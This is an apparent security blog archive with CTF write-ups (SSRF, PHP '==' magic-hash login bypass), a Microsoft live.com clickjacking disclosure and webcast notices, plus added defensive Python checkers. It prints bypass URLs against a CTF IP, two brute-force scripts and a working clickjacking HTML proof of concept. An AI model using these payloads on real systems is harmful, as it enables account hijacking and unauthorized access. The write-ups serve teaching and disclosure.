Drupal 8.0.0-beta14 Vendor Script Vulnerable to XSS

September 5, 2015

Overview

Recently, I was playing around with the Drupal CMS application code. Drupal is an open source CMS widely used for blogging; to know more about Drupal, see
here. The advantage of an open source application is that the source code was at my disposal.

While fiddling around with the core Drupal vendor package I stumbled upon a very interesting XSS vulnerability. The idea was then to see how exactly an attacker could exploit this particular XSS to impact Drupal users at large.
So let me walk you through the technical process of discovery and impact assessment for the Drupal source code audit which led to the discovery of an XSS that can be used to hijack Drupal accounts or to perform other malicious activity.

Read more here : http://blog.securelayer7.net/core-drupal-8-0-0-beta14-xss-attack/

Thank you for reading my blog

We Provide Penetration Testing

Malware Detection : Adding glastopf juice to maldet engine

September 4, 2015

At SecureLayer7, we continuously try to keep our customers updated on the latest threats that could affect their infrastructure and help them secure their perimeter. More often than not we devise attack scenarios and then brainstorm how to block such attempts. During one such brainstorming session, we took an interesting detour to check a couple of our ideas.

For more details: http://blog.securelayer7.net/malware-detection-adding-glastopf-juice-to-maldet-engine/

 

Thank you for reading :-)


CVE-2015-2652 – Unauthenticated File Upload in Oracle E-business Suite.

July 15, 2015

Hi,

I've posted complete details about CVE-2015-2652 – Unauthenticated File Upload in Oracle E-Business Suite at the following company link.

http://blog.securelayer7.net/cve-2015-2652-unauthenticated-file-upload-in-oracle-e-business-suite/

 

– S


SSRF/XSPA (Web Application Vulnerability) CTF Write up- Garage4Hackers

June 23, 2015

Last time we organized a CTF based on a web application vulnerability, i.e. SSRF / XSPA. For those who are new to SSRF, please go through this slide deck: http://www.slideshare.net/d0znpp/ssrf-attacks-and-sockets-smorgasbord-of-vulnerabilities.

Just for the record, the next G4H Ranchoddas Webcast is on Mobile Applications, and registration is open.

You can find CTF source code here: https://github.com/sandeepl337/Garage4hackers-March-2015-CTF-SSRF-XSPA .

On the CTF server we ran an internal application on port 80 and an external application. The mission of the CTF was to find the flag in a PHP file. The vulnerable external application is used to extract the title of any website.

The following write-up is from Hai Au Huynh:

—— START ——

First, we put "foobar" into the url parameter and got "Caught exception: _(asfsafindex.php): failed to open stream: No such file or directory" => the application parses our input as a file and reads it.

So it's clear that the next step is to read the source code of the application: we put "index.php" into the url parameter and get the index.php source code.

The code does something like this:
include('include/extractTitleLogic.php');
It gets the contents of the url parameter input; if it has a title tag, it prints out the title, if not it prints out the contents of the input. With include/extractTitleLogic.php disclosed, we try to read the contents of include/extractTitleLogic.php, but it contains the title tag, so we cannot read it. But fortunately include/index.php does
not, so we can read it out.

In the source code of include/index.php, we get:
// "The feeling that conversations and any data (whiteboard included)
are encrypted without having to mess around with complicated options and setup is a massive plus. It's very very easy to use." –
zorgalicious
// //  You Found key! w00t!! :)
// Decrypt Blowfish following code and send CTF Flag to following email
//   49FE06DB9909C6FC6AE11D44F12CD39F659690A388F660A13709CDFA7F06A0E9343E9058EADB9A4CE9AE4F2BC2585768

The first quote seems to make sense, so we search for it, and it leads to this:
http://www.bitwiseim.com/features.php?f=Encryption&Presentation=Mac.
So at this point it's very clear that we can decrypt the Blowfish message at that site, and get the flag: Garage4Hacker Private Key:
0x33331337

—— END ——
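The write-up above shows the two mistakes that made the CTF target exploitable: the "fetch a URL and extract its title" feature accepted anything (a bare path such as index.php was opened as a local file) and it would happily fetch the internal application on port 80. The following is an added example, not part of the CTF or of Hai Au Huynh's write-up, of the pre-flight check such a feature should run before fetching. The function names (validate_fetch_target, fake_resolve), the FAKE_DNS table and the example hosts are all constructed for the demonstration; the resolver is injectable so the check runs offline.

```python
# Added example: validating a user-supplied URL before a server-side fetch.
# Not code from the CTF; names and the FAKE_DNS table are constructed.
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def system_resolve(host):
    """Resolve a hostname to the set of IP address strings it points at."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def _is_public(ip_text):
    """True only for globally routable unicast addresses.

    IPv4-mapped IPv6 (::ffff:127.0.0.1) is unmapped first so it cannot be
    used to smuggle a loopback or RFC 1918 target past the check.
    """
    ip = ipaddress.ip_address(ip_text)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return ip.is_global and not ip.is_multicast


def validate_fetch_target(url, resolve=system_resolve):
    """Return (ok, reason) for a user-supplied URL.

    `resolve` is injectable so the check can be exercised offline. In
    production the caller should connect to one of the addresses returned
    here instead of re-resolving the name, to close the DNS-rebinding window.
    """
    parts = urlsplit(url.strip())
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        # Covers file://, gopher://, php:// and bare paths such as "index.php".
        return False, "scheme not allowed: %s" % (scheme or "(none)")
    if parts.username or parts.password:
        return False, "credentials in URL not allowed"
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    try:
        # A literal IP is checked directly; a name goes through the resolver,
        # which also catches decimal/hex forms such as 2130706433 or 0x7f.0.0.1.
        ipaddress.ip_address(host)
        addresses = {host}
    except ValueError:
        try:
            addresses = resolve(host)
        except OSError:
            return False, "cannot resolve host: %s" % host
    for addr in addresses:
        if not _is_public(addr):
            return False, "%s resolves to non-public address %s" % (host, addr)
    return True, "ok"


# Constructed, offline stand-in for DNS used by the demo below.
FAKE_DNS = {
    "example.com": {"93.184.216.34"},
    "intranet.corp": {"10.0.0.5"},
    "localhost": {"127.0.0.1"},
    "dual.example": {"93.184.216.34", "::1"},  # one public and one loopback record
}


def fake_resolve(host):
    """Constructed resolver: looks the name up in FAKE_DNS or fails like NXDOMAIN."""
    if host not in FAKE_DNS:
        raise OSError("NXDOMAIN: " + host)
    return FAKE_DNS[host]


if __name__ == "__main__":
    for candidate in ["index.php", "file:///etc/passwd", "http://localhost/",
                      "http://intranet.corp:80/", "http://127.0.0.1/",
                      "http://[::ffff:10.0.0.5]/", "http://dual.example/",
                      "http://example.com/"]:
        print("%-28s -> %s" % (candidate, validate_fetch_target(candidate, fake_resolve)))
```

Rejecting any name that has even one non-public record (dual.example above) is deliberate: a resolver that returns several addresses lets the client pick, and an attacker controls which ones appear.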

 


Writeup on Garage4Hackers Xmas / Dec Web Challenge 2014

December 10, 2014

Ho Ho Ho, the Xmas challenge has ended. This challenge was all about bypassing login authentication. Obviously, it was a fun challenge!! And the obvious hint was the password MD5 hash: a footnote was left in the source code.

Code:
<!--
    We are so generous, see we provided you password hash to login :) 0e100132199235687421930375421091
    if(0e100132199235687421930375421091 == md5($_GET['pass']))
    {
      // Simple PHP CODE Logic
    }
  ?> -->

The Garage4Hackers Xmas Challenge is written in PHP and is available to download for learning purposes.

Just a quick note: if you want to join the G4H CTF team, then PM me, and check out our Ranchoddas event from last month.

And I'm back to business. The main purpose of the CTF is to understand the PHP equal to (==) operator used for comparison, and you can study the strcmp function as well. If a developer uses the equal to (==) operator without weighing the risk, then it can be profitable for an attacker. However, the attack can be carried out in rare cases only. We received some expected results and some unexpected ones, but in the end both are results.

There were 4k+ unique hits on the CTF page in 24 hours, but we received only a few valid submissions.

Following is the list of ninjas who solved the challenge in time.

Code:
jinmo123  - Good Solution but not expected
tlk ( https://twitter.com/tlk___ ) - Nice Solution, but Not expected
stypr (https://stypr.com) - W00tt , expected solution
Ajin Abraham - Nice Solution, but Not expected
sagar popat  - Nice Solution, but Not expected
Sharath Unni - W00tt , expected solution

There were three ways to solve this CTF. The expected way was to bypass authentication by abusing the PHP equal to (==) operator. Brute forcing the username was the second, easy way to solve the challenge, and the last way was monkey testing. (Just kidding)

PHP CTF Code:

Code:
<?php
error_reporting(0);
$a = htmlentities($_GET['username']);
$c = htmlentities($_GET['password']);
$b = md5($c);
if (!empty($a) AND !empty($b)) { // empty function made this CTF more easy
    if ("0e100132199235687421930375421091" == $b) { // vulnerable line
        if ($b === "0e100132199235687421930375421091") { // To avoid some bugs and change behavior of CTF
            if ("133E-1337" === $a) { // To avoid some bugs and change behavior of CTF
                print "Flag : Garage4H4x0rFlagPhpFlag1337";
            } else {
                print "umm!! nice try dude :), oops! you don't know username";
            }
        } else {
            if ($a === "0e100132199235687421930375421091") { // To avoid some bugs and change behavior of CTF
                print "umm!! nice try dude :), oops! ";
            } else {
                if ("133E-1337" == $a) { // vulnerable line
                    print "Flag : Garage4H4x0rFlagPhpFlag1337";
                } else {
                    print "Wrong Username";
                }
            }
        }
    } else {
        print "wrong  Password";
    }
}
?>

Here is some background on the PHP equal to operator and its expected behavior.

Code:
Input       | Output
-------------------------
"0" == "0" | True
"1" == "0" | False
-------------------------

Unexpected behavior of the PHP equal to operator:

Code:
Input       | Output
-------------------------
"0e1" == "0" | True
-------------------------

In detail:
PHP treats both operands as numeric strings in scientific notation: 0e1 = 0 * 10^1, which is 0, so "0e1" and "0" compare as equal numbers.

Code:
 <?php
   var_dump("0e1" == 0);
 ?>
Code:
Finding entry points
Branch analysis from position: 0
Return found
filename:       /in/Pvj4s
function name:  (null)
number of ops:  4
compiled vars:  none
line     # *  op                           fetch          ext  return  operands
---------------------------------------------------------------------------------
   2     0  >   IS_EQUAL                                         ~0      '0e1', 0
         1      SEND_VAL                                                 ~0
         2      DO_FCALL                                      1          'var_dump'
         3    > RETURN                                                   1

Here is where the fun starts: the check is a loose (==) comparison of MD5 hashes, which is how many developers compare password hashes.

Code:
var_dump(0e100132199235687421930375421091 == md5(urldecode('%02%a27%84')));
 bool(true) // w00t :)

Another string :

Code:
'\x98-\xde\x1f'

// Submission by Beched (@ahack_ru)

try here : http://3v4l.org/NK5hp

Our check was too simple to bypass because we hadn't put quotes around the hash. That made it a numeric literal (a float equal to 0), which makes the expression true for any hash that does not start with [1-9]. (This part is PHP 5/7 behavior: since PHP 8, a number compared with a non-numeric string is compared as strings, so an unquoted literal only matches digests that are themselves numeric strings, i.e. the 0e... hashes. The numeric-string versus numeric-string case below is unchanged in PHP 8.)

Here is the bypass if we put quotes around the hash:

Code:
php > var_dump('0e100132199235687421930375421091'==md5("\x0e\xd7\xb6\xea"));   // Submission by Beched (@ahack_ru)
bool(true)

Try here : http://3v4l.org/M9dpY

Here is another simple example, which can be found on the internet:

Code:
http://3v4l.org/2vrMi
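The tables above and the two bypasses are all the same rule: when both sides of == are numeric strings, PHP compares them as numbers, and any digest of the form 0e followed only by digits is 0. The following is an added example, not part of the CTF code, that models that rule in Python, checks candidate passwords for "magic" MD5 digests, and shows the strict comparison that closes the hole. The regular expression is a simplified model of PHP 7+ numeric strings (hex strings such as 0x00 stopped being numeric in PHP 7, so a PHP 5 target would accept more). QNKCDZO and 240610708 are taken from the submissions further down; "password" is a constructed control value. The names php_loose_eq, is_magic_md5, find_magic and strict_eq are the example's own.

```python
# Added example: Python model of PHP's == on strings, magic-hash check, and
# the strict comparison that should have been used. Not code from the CTF.
import hashlib
import hmac
import re

# Simplified model of a PHP 7+ numeric string: optional leading whitespace,
# an optional sign, an integer or decimal, and an optional exponent.
_NUMERIC = re.compile(r"\s*[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?")

# "0e" followed only by digits parses as 0 * 10^n, i.e. 0.0.
MAGIC_DIGEST = re.compile(r"0e\d+")

STORED = "0e100132199235687421930375421091"  # the hash from the CTF source


def is_numeric_string(s):
    return _NUMERIC.fullmatch(s) is not None


def php_loose_eq(a, b):
    """Model of `$a == $b` for two PHP strings.

    If both sides are numeric strings PHP compares them as numbers (floats
    here), which is why "0e1" == "0" and why two different digests of the
    form 0e<digits> compare equal. Otherwise the bytes are compared.
    """
    if is_numeric_string(a) and is_numeric_string(b):
        return float(a) == float(b)  # "133E-1337" underflows to 0.0, as in PHP
    return a == b


def md5_hex(password):
    return hashlib.md5(password.encode("latin-1")).hexdigest()


def is_magic_md5(password):
    """True if md5(password) is 0e<digits>, i.e. loosely equal to 0 and to STORED."""
    return MAGIC_DIGEST.fullmatch(md5_hex(password)) is not None


def find_magic(candidates):
    """Return the candidates whose MD5 digest is a magic hash."""
    return [c for c in candidates if is_magic_md5(c)]


def strict_eq(stored_digest, candidate_digest):
    """What the check should have been: PHP `===` or hash_equals(), a
    byte-for-byte comparison with no type juggling (constant-time here)."""
    return hmac.compare_digest(stored_digest.encode(), candidate_digest.encode())


if __name__ == "__main__":
    for pw in ["QNKCDZO", "240610708", "password"]:
        d = md5_hex(pw)
        print(pw, d, "loose:", php_loose_eq(STORED, d), "strict:", strict_eq(STORED, d))
    # The username check "133E-1337" == $a accepts anything that parses to 0.
    for user in ["0", "00", "-0", "0.0", "0e12323", "133E-1337", "admin", "0x00"]:
        print(repr(user), php_loose_eq("133E-1337", user))
```

Searching for a new magic password is a brute force over roughly one in twenty million MD5 outputs (the first hex digit must be 0, the second e, and the remaining 30 must all be decimal digits), so in practice testers reuse the known ones, which is exactly what the submissions below do.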

While testing this CTF, Sharath Unni found a second hash that also passes the check:

Code:
0e100132199235687421930375421091 (Found in HTML source code )
0e104142395260374396839196939683 (also passes the == check)

This is not an MD5 collision: they are two different digests that both have the form 0e followed only by digits, so == treats both as the number 0. The plaintext 26177715789, used as the password in several of the submissions below, gives a hash of that form; you can look MD5 values up here

Code:
 http://www.md5online.org/


This was all about the PHP equal to operator; now, what is the solution of this CTF?

Here is one solution, and you can find many more ways:

Code:
http://162.208.48.16/?username=0e57640477961333848717747276704&password=BRTKUJZ&submit=Login&debug=true
http://162.208.48.16/?username=0e1&password=NOOPCJF&submit=Login&debug=true
http://162.208.48.16/?username=0e2&password=26177715789&submit=Login&debug=true

Submission by jinmo123

Code:
http://162.208.48.16/?username=000&password=240610708&submit=Login#

Submission by tlk ( https://twitter.com/tlk___ )

Brute Force Script:

Code:
import requests

s = requests.session()
for i in range(255):
    r = s.get("http://162.208.48.16/?username=" + chr(i) + "&password=QNKCDZO&submit=Login")
    print(len(r.content), chr(i), i, "Wrong Username" in r.text)

We can see that only #, & and 0 do not contain "Wrong Username". Let's try to prepend '0':

Code:
for i in range(255):
    r = s.get("http://162.208.48.16/?username=0" + chr(i) + "&password=QNKCDZO&submit=Login")
    print(len(r.content), chr(i), i, "Wrong Username" in r.text)

Code:
http://162.208.48.16/?username=0.0&password=QNKCDZO&submit=Login

Two Submission by stypr (https://stypr.com)

Code:
http://162.208.48.16/?username=0e57640477961333848717747276704&password=BRTKUJZ&submit=Login&debug=true
http://162.208.48.16/?username=0x00&password=BRTKUJZ&submit=Login&debug=true

Submission by Ajin Abraham

Code:
import urllib.request

with open("10k most common.txt", "r") as f:
    url = 'http://162.208.48.16/?username=[X]&password=26177715789'
    no = 0
    for line in f:
        line = line.rstrip("\r\n")
        turl = url.replace("[X]", line)
        response = urllib.request.urlopen(turl)
        html = response.read().decode("utf-8", "replace")
        response.close()
        dat = html[:50]
        no += 1
        log = str(no) + " Username: " + line + " Response: " + dat
        if "Wrong" in log:
            print(no)
        else:
            print(log)
Code:
URL:http://162.208.48.16/?username=-0&password=26177715789

Submission by Sagar Popat

Code:
http://162.208.48.16/?username=00&password=26177715789&submit=Login

Submission by Sharath Unni

Code:
http://162.208.48.16/?username=0e12323&password=26177715789&submit=Login

That's all for today. Thank you for reading.


Garage4Hackers Ranchoddas Webcast Series – Browser Crash Analysis By David Rude II aka Bannedit

April 17, 2014

 

Check out Recordings of Browser Crash Analysis By David Rude II aka Bannedit


UI redress attack on live.com (affected all pages).

On 7/29/13 I reported the Live.com XFO vulnerability to the Microsoft Security team, and their investigation finally came to a conclusion and the bug was fixed. So here are the details of the bug and the timeline of the fix. A year ago, on a weekend, I started digging into MS services for bugs, and this vulnerability seemed interesting enough to share on Garage4Hackers.

The timeline of investigation of the bug : July 29, 2013 – April 16 , 2014.

[Image: msresponse.jpg]

The interesting part of the vulnerability: all pages were protected against UI redress attacks, and while testing I normally test the application on all browsers. Here comes the weird part: I was able to iframe all the pages of Live.com, including pre-authentication and post-authentication pages, on Mozilla Firefox 3.6.28 through Mozilla Firefox 6. On Chrome and the other browsers the XFO protection was working perfectly on all pages.

Random announcement, nothing to do with this post: check out the recorded video of the Garage4Hackers Ranchoddas Webcast Series – Browser Crash Analysis By David Rude II aka Bannedit
Note: have a look at the same vulnerability in Facebook application installing.

Obviously, you must be wondering why this happens with Mozilla. After doing some research and consulting with the G4H team, I concluded that it may be an issue with the Gecko engine. The test environment was Windows 7 and Ubuntu 10, 11 and 12.
Note: if you stumbled upon the same issue with Gecko, then please reply on this thread.

Check out the following headers: the XFO header is missing for Gecko/20120306 Firefox/3.6.28 through Firefox 6. Note that it is the server's response for this User-Agent that carries no X-Frame-Options at all, so these browsers were never given a framing policy to enforce.

Code:
        https://blu166.mail.live.com/m/?bfv=wm

        GET /m/?bfv=wm HTTP/1.1
        Host: blu166.mail.live.com
        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-us,en;q=0.5
        Accept-Encoding: gzip,deflate
        Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
        Keep-Alive: 115
        Connection: keep-alive
        Cookie:

        HTTP/1.1 200 OK
        Content-Type: text/html; charset=utf-8
        Content-Encoding: gzip
        Vary: Accept-Encoding
        Server: Microsoft-IIS/7.5
        X-Wlp-StartTime: 29-07-2013 10:10:32 AM
        xxn: 22
        P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
        MSNSERVER: H: BLU166-W22 V: 17.1.6722.6001 D: 2013-07-22T22:56:20
        X-Powered-By: ASP.NET
        Content-Length: 3113
        Date: Mon, 29 Jul 2013 10:10:32 GMT
        Connection: keep-alive
        Set-Cookie: bfv=wm; domain=.live.com; path=/
        Set-Cookie: widecontext=X; path=/; secure
        Set-Cookie: domain=.live.com; path=/
        Set-Cookie: xidseq=7; domain=.live.com; path=/
        Set-Cookie: LD=; domain=.live.com; expires=Mon, 29-Jul-2013 08:30:32 GMT; path=/
        Cache-Control: no-cache, no-store, must-revalidate, no-transform
        Pragma: no-cache
        Expires: -1, -1

Here are some screenshots of basic operations on live.com (I would like to remind you, every page of live.com was vulnerable).

The attacker developed this page to attack the victim.

Composing Email:

Uploading Attachment:

Deleting Emails:

[Image: https://dl.dropboxusercontent.com/u/18007092/ms-click4.png]

HTML POC which I sent to the MS Security Team:

Code:
<html>
<!-- Quickly developed POC, for testing purposes -->
<!-- Visit Garage4hackers.com -->
<head>
	<title> Live Mail Send Clickjacking - Garage4hackers.com </title>
	<style>
		iframe {
		  width:800px;
		  height:800px;
		  position:absolute;
		  top:0; left:0;
		  filter:alpha(opacity=50); /* in real life opacity=0 */
		  opacity:0.5;
		}
	</style>
</head>
<body>
	<br>
	<br>
	<br>
	<br>
	<br>
	<br>
	<br>
	<br>
<div><center>Bhag Milkha Bhag Competition</center></div>
<center><b>Click Connect and you will get a Bhag Milkha Bhag T-shirt.</b></center>

    <!-- the real compose page, made transparent and laid over the lure; the visible link sits under it at z-index -1 -->
    <iframe src="https://blu166.mail.live.com/m/compose.m/?fid=00000000-0000-0000-0000-000000000001&to=sandeepk.l337@gmail.com"></iframe>
	<a href="http://www.google.com" target="_blank" style="position: relative; left: 0px; top: 220px; z-index: -1;">Connect</a>

</body>
</html>
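The bug only showed up because the same URL was requested with several browsers and the responses were compared. The following is an added example, not code from the post, of that check as a script: it classifies the anti-framing policy a response carries and reports which User-Agents received a framable page. The first capture reproduces the header set shown above (no X-Frame-Options); the Chrome capture, the Chrome User-Agent string and the SAMEORIGIN value in it are constructed for the demonstration, and the function names framing_policy and framable_variants are the example's own. CSP frame-ancestors is given precedence over X-Frame-Options when both are present, as the CSP specification requires.

```python
# Added example: classify anti-framing headers and compare per-User-Agent
# captures. Not code from the post; the Chrome capture is constructed.
import re

FIREFOX36_UA = ("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) "
                "Gecko/20120306 Firefox/3.6.28")
# Constructed User-Agent for the protected variant.
CHROME_UA = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 Chrome/28.0.1500.95"


def framing_policy(headers):
    """Classify the anti-framing protection in a response's headers.

    Returns 'deny', 'sameorigin', 'allow-list' or 'framable'. A CSP
    frame-ancestors directive takes precedence over X-Frame-Options; header
    names are matched case-insensitively.
    """
    lower = {k.lower(): v for k, v in headers.items()}
    csp = lower.get("content-security-policy", "")
    m = re.search(r"(?:^|;)\s*frame-ancestors\s+([^;]+)", csp, re.I)
    if m:
        sources = m.group(1).split()
        if sources == ["'none'"]:
            return "deny"
        if sources == ["'self'"]:
            return "sameorigin"
        return "allow-list"
    xfo = lower.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return "deny"
    if xfo == "SAMEORIGIN":
        return "sameorigin"
    if xfo.startswith("ALLOW-FROM"):  # only honoured by IE and old Firefox
        return "allow-list"
    return "framable"  # no header, or a value browsers ignore


def framable_variants(captures):
    """Given [(user_agent, headers), ...] return the UAs that got a framable response."""
    return [ua for ua, h in captures if framing_policy(h) == "framable"]


# Constructed captures. The first mirrors the live.com response headers shown
# above (no X-Frame-Options at all); the second is what a protected variant
# of the same page would look like.
CAPTURES = [
    (FIREFOX36_UA, {
        "Content-Type": "text/html; charset=utf-8",
        "Server": "Microsoft-IIS/7.5",
        "X-Powered-By": "ASP.NET",
        "Cache-Control": "no-cache, no-store, must-revalidate, no-transform",
    }),
    (CHROME_UA, {
        "Content-Type": "text/html; charset=utf-8",
        "Server": "Microsoft-IIS/7.5",
        "X-Frame-Options": "SAMEORIGIN",
    }),
]

if __name__ == "__main__":
    for ua, h in CAPTURES:
        print(ua.split(" ")[-1], "->", framing_policy(h))
    print("framable for:", framable_variants(CAPTURES))
```

Run the same request with each User-Agent in your test matrix and feed the header dicts into framable_variants; a page that is "sameorigin" for one browser and "framable" for another is exactly the class of bug reported here.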

Let me know if you have any question about this bug

– [S]


After 9 Months of Investigation the Microsoft Security Team Fixed the Bug

March 18, 2014

Last night, while the Garage4Hackers Ranchoddas event was running, I received a message from the Microsoft Security Team with the following statement, regarding one vulnerability on multiple pages [nearly all pages of Live] of Live.com / hotmail.com [mobile version].

Microsoft Vulnerability

I hope they fix this very soon and I’ll share more details on the bug on Garage4hackers.com

Thank You
Sandeep


Garage4hacker's Ranchoddas Series 2 on Reverse Engineering

After a lot of technical problems we're done! Thank you for your patience! I will re-record this and post it on YouTube and garage4hackers.com in a few days.

Thank you


Data, data, data! I can’t make bricks without clay by Gynvael Coldwind – Google Security Engineer and Dragon Sector Team Captain.

Dear all,
Garage4Hacker invites you to join us for a webinar titled Data, data, data! I can’t make bricks without clay by Gynvael Coldwind – Google Security Engineer and Dragon Sector Team Captain.

For Registration, please fill the following form.
https://docs.google.com/forms/d/1L3-…RlNdI/viewform

Reverse engineering is more an art than a science. From the realms of vulnerability discovery to debugging for internals, reverse engineers are a rare breed with the ability to think backwards through the chain of events: discovering the technological principles of a device, object, or system through analysis of its structure, function, and operation. With the growth of exploit development and the rise of malware attacks, reverse engineering is becoming a key area to study.

==UPDATE==
Video stream: https://plus.google.com/events/c2puj…m01lo615eio8a8 or http://www.garage4hackers.com/pages.php?pageid=4
Questions / chat: #g4h @ irc.freenode.org (or via web: http://www.garage4hackers.com/pages.php?pageid=3)
–UPDATE–

What to expect:
The presentation would revolve more around the approaches taken in RE than usage of tools. It will be focused on various practical tips and tricks that can speed up the process of reverse-engineering. The presented information will not be strictly tied to any specific platform or tool – most of it can be applied on any architecture or operating system.

Examples of topics:
– how to start with an unknown architecture
– debugger scripting
– creating your own useful tools
– etc

Prerequisites:
– some reverse-engineering experience or general interest in reverse-engineering
– basic programming skills
– basic knowledge of how the CPU and operating systems work
